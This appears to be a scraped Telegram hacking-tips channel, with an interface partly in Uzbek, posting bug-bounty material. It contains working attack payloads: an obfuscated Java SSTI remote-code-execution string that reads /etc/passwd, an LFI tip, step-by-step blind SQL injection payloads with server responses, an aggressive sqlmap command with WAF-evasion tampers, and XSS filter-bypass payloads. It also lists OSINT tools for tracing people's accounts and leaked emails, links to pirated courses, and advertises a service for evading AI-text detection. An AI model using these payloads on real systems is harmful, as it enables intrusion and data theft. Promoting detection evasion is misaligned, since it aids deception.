Termux All Command [Telegram Group]
Kanalga Telegramโda oโtish
Hello This Is Termux All Command Official Telegram Group. Here Share All Kind of Resourses. It is Also backup of Facebook Page Telegram Channel >> https://t.me/termuxcommandfull Facebook Page >> https://www.facebook.com/termux.command.full
Ko'proq ko'rsatish1 185
Obunachilar
+324 soatlar
+187 kunlar
+4830 kunlar
Postlar arxiv
๐ 7 Free Online #OSINT Tools
GHUNT - Google account info
Sherlock - nickname enumeration
Holehe - search accounts by email
Ignorant - search accounts by phone
Whois domain lookup
WhatsApp profile info
HudsonRock - email leaks lookup
Check them out: osint.rocks
๐just got LFI at one of the Hackerone program.
๐คtip: in multipart request there was parameter "PATH" simply entered /etc/passwd and got this great response.
BigBountyRecon ๐ Tool utilises 58 different techniques using various Google dorks and open source tools to expedite the process of initial reconnaissance on the target organisation.
๐ https://lnkd.in/gAVUpQr4
Bug : Remote Code Execution
Parameter : /parameter/invoice/{payload}/2627627
Payload :
${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}
Context : first of all i have tried SSTI ${7*7} got 49 so i confirmed that there is possibility of SSTI. Later on determined it's JAVA. just trying more and more got .
Blind Boolean-Based SQLi
.
a'-IF(LENGTH(database())>100,SLEEP(7),0)or'1'='1 ----> HTTP/2 500 Internal Server Error
.
a'-IF(LENGTH(database())>11,SLEEP(7),0)or'1'='1 ----> HTTP/2 500 Internal Server Error
.
a'-IF(LENGTH(database())>10,SLEEP(7),0)or'1'='1 ----> HTTP/2 500 Internal Server Error
.
a'-IF(LENGTH(database())>9,SLEEP(7),0)or'1'='1 ----> HTTP/2 200 OK
.
a'-IF(LENGTH(database())>8,SLEEP(7),0)or'1'='1 ----> HTTP/2 200 OK
.
a'-IF(LENGTH(database())>7,SLEEP(7),0)or'1'='1 ----> HTTP/2 200 OK
.
a'-IF(LENGTH(database())>6,SLEEP(7),0)or'1'='1 ----> HTTP/2 200 OK
.
a'-IF(LENGTH(database())>5,SLEEP(7),0)or'1'='1 ----> HTTP/2 200 OK
.
Database Length is == 10 characters
Open Perplex
New free AI search engine and chat assistant.
Based on Meta LLama 3 70B.
Can be used as an alternative to ChatGPT, Perplexity, You etc.
openperplex.com
Web Vulnerability Resource - XSS
Unferstanding XSS Attack
https://lnkd.in/dg9THu25
XSS Filter Evasion by johnermac
https://lnkd.in/dk_gpSRP
Payloads XSs Evasion by citybasebrooks
https://lnkd.in/d4YQjBxE
XSS Resource by BruteLogic
https://lnkd.in/dcVG-RSX
XSS Challegens
https://lnkd.in/dhcbNe6d
https://lnkd.in/dif8SVjK
How to Find XSS by HackerOne
https://lnkd.in/dvqNm5bT
Learning about Cross Site Scripting (XSS)
https://lnkd.in/dYETX2VV
XSS CheatSheet by Portswigger Labs
https://lnkd.in/dAxxwj4
Hacktivity XSS by HackerOne
https://lnkd.in/dNNM86wx
XSS Explained by NahamSec
https://lnkd.in/dJiTs2td
XSS Stored, Blind, Reflected and DOM by InsiderPhD
https://lnkd.in/d9KzwBfd
Web Hacking Beyond Alert by Wild West
https://lnkd.in/djbgjFS8
XSS Tools
XSSTRIKE https://lnkd.in/dJkuhQ4X
Dalfox https://lnkd.in/dp_UnjGM
XSSMap https://lnkd.in/dgfqdEhj
FinDOM XSS https://lnkd.in/dffQm67D
Here we are! The Compressive SQLMap Command for You!.
sqlmap -u "target.com" --crawl=3 --level=5 --risk=3 --tamper="apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,commalesslimit,commalessmid,commentbeforeparentheses,concat2concatws,equaltolike,escapequotes,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,overlongutf8,percentage,randomcase,randomcomments,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,varnish,versionedkeywords,versionedmorekeywords,xforwardedfor" --dbs --random-agent --batch --threads=10 --output-dir=InjectionResult --time-sec=10 --retries=3 --flush-session --fresh-queries -v 3
HTML Sanitizer Bypass Cloudflare leads to XSS ๐
payload: '<00 foo="XSS-CLick--%20/
hashtag#infosec hashtag#cybersec hashtag#bugbountytips
Digital Methods Tools Archive
60+ free online tools for various highly specialized tasks in online investigations. For example:
- Wikipedia Edits IP Localizer
- Robots.txt Discovery
- Amazon Related Product Graph
and more.
https://wiki.digitalmethods.net/Dmi/ToolDatabase
Twitter Tools
View username, display name and bio history of any Twitter user.
twitter.lolarchiver.com
Partly free. Works well, but not always accurately. Use in combination with other similar tools (like UserSearch etc).
๐afrog - Vulnerability Scanner
afrog is a fast and reliable tool for finding and fixing vulnerabilities. It supports custom PoCs and detects issues like CVEs, unauthorized access, and file reading.
๐ GitHub: github.com/zan8in/afrog
๐๐๐ ๐๐ฒ๐ฉ๐๐ฌ๐ฌ ๐ฎ๐ฌ๐ข๐ง๐ ๐๐ง๐ข๐๐จ๐๐ ๐๐ฌ๐๐๐ฉ๐ ๐ฐ๐ข๐ญ๐ก ๐๐๐๐ ๐๐ง๐ญ๐ข๐ญ๐ข๐๐ฌ.
๐๐ฎ๐ฅ๐ง :
๐. " ๐จ๐ง๐๐ฅ๐ข๐๐ค=๐ฅ๐จ๐๐๐ญ๐ข๐จ๐ง.๐ก๐ซ๐๐="๐ฃ๐๐ฏ๐๐ฌ๐๐ซ๐ข๐ฉ๐ญ:๐">
First try, ๐ผ๐ป๐ฐ๐น๐ถ๐ฐ๐ธ (event handler) passes. However, ๐น๐ผ๐ฐ๐ฎ๐๐ถ๐ผ๐ป.๐ต๐ฟ๐ฒ๐ณ does not pass and is blocked by waf.
๐. " ๐จ๐ง๐๐ฅ๐ข๐๐ค=๐ฅ\๐ฎ{๐๐
}๐๐๐ญ๐ข\๐ฎ{๐๐
}๐ง.๐ก๐ซ๐๐="๐ฃ๐๐ฏ๐๐ฌ๐๐ซ๐ข๐ฉ๐ญ:๐">
Second try, bypassing ๐น๐ผ๐ฐ๐ฎ๐๐ถ๐ผ๐ป.๐ต๐ฟ๐ฒ๐ณ with unicode escape. \๐{๐ฒ๐} is the unicode escape of the letter ๐ผ.
Payload bypass ๐น๐ผ๐ฐ๐ฎ๐๐ถ๐ผ๐ป.๐ต๐ฟ๐ฒ๐ณ with unicode escape successfully passed. However, our payload gets output like
"๐ผ๐ป๐ฐ๐น๐ถ๐ฐ๐ธ=๐น\\๐{๐ฒ๐}๐ฐ๐ฎ๐๐ถ\\๐{๐ฒ๐}๐ป.๐ต๐ฟ๐ฒ๐ณ=>
When we added a backslash from the previous unicode escape, the web app automatically added another backslash which caused our payload to not work.
๐. " ๐จ๐ง๐๐ฅ๐ข๐๐ค=๐ฅ&#๐๐;๐ฎ{๐๐
}๐๐๐ญ๐ข&#๐๐;๐ฎ{๐๐
}๐ง.๐ก๐ซ๐๐="๐ฃ๐๐ฏ๐๐ฌ๐๐ซ๐ข๐ฉ๐ญ:๐">
Our next experiment bypassed the backslash using the HTML Entities encode. &#๐ต๐ฎ; is the HTML Entities encode of the backslash.
Our payload passes and the XSS is successfully triggered on the Firefox browser.
๐
๐ฎ๐ฅ๐ฅ ๐ฉ๐๐ฒ๐ฅ๐จ๐๐:
" onclickโ=l\u{6F}cati\u{6F}n.href="javascriptโ:alert(1)">
๐ฉ 19 Courses to learn Ethical Hacking ๐
https://drive.google.com/drive/u/0/mobile/folders/1CdrveRU2iXGabR-nQ-G1o9GC4GusU-92?fbclid=IwAR1K9QFH8vK4k432rh7V7rnd_sHtGCHx6Tt7uNlkpmOUkQ_2RZaotFvymX0
๐ฉ Bug Bounty Hunting: Guide to an Advanced Earning Method๐
https://drive.google.com/drive/folders/1t-hTqg0-02t0cnc5SypHnb8t3CfE3bXU
๐ฉ Bug Bounty: Android Hacking๐
https://mega.nz/#F!h4hHGIYa!2ta4n94iQNnVzpJToVPLVw
๐ฉ Bug Bounty: Web Hacking๐
https://drive.google.com/file/d/1Z6vX133ZA5DGIhrBJAuJfMJ2Gu7Y4C21/edit
๐ฉ Burp Suite Bug Bounty Web Hacking from Scratch๐
https://drive.google.com/file/d/1eWy5HVLw3tvw4lfsT7kYb5dnD1l0RsoW/view
๐ฉ Bug Bounty Hunting - Offensive Approach to Hunt Bugs๐
https://mega.nz/#F!Ge4gmSIL!lW-7XC2DnEKryjXie35APw!mGw30bCI
HOW TO BYPASS AI DETECTION
Imagine a world where AI-generated content blends seamlessly with human creativity, making it impossible to distinguish between the two. Fascinating, isnโt it? Now you can bypass detection systems effortlessly while maintaining the art of writing.
> Website: bypassgpt.ai
Here are the top 40 YouTubers in cybersecurity:
1. David Bombal
2. Null Byte
3. NetworkChuck
4. CYBER TRUTH
5. HackerSploit
6. IppSec
7. John Hammond
8. Cyber Insecurity
9. The Cyber Mentor
10. LearnCyberSecurity
11. GeraldAuger
12. HackerSploit
13. Sami Laiho
14. Navin Reddy
15. The PC Security Channel
16. Security Tube
17. OTW Cybersecurity
18. CyberTalkinators
19. Trace Labs
20. The Cyber Mentor
21. LiveOverflow
22. Cyber Secrets
23. HackerOne
24. HackingeBooks CTF
25. Seytonic
26. Cybr
27. Adrian Crenshaw
28. BlackHat Python
29. Cybr Expert
30. TechSavvy
31. TechNintra
32. SecurityIdiots
33. HackerOne
34. SemmleDev
35. Hackers.Mayuri
36. Hak5
37. Gabriel Alonso
38. CyberMentor
39. STรK
40. Cyber Weapons Lab
#ig1code #imagine1code #chatgpt #StackOverflow #Youtube #youtubeshorts #youtubechannel
Endi mavjud! Telegram Tadqiqoti 2025 โ yilning asosiy insaytlari 
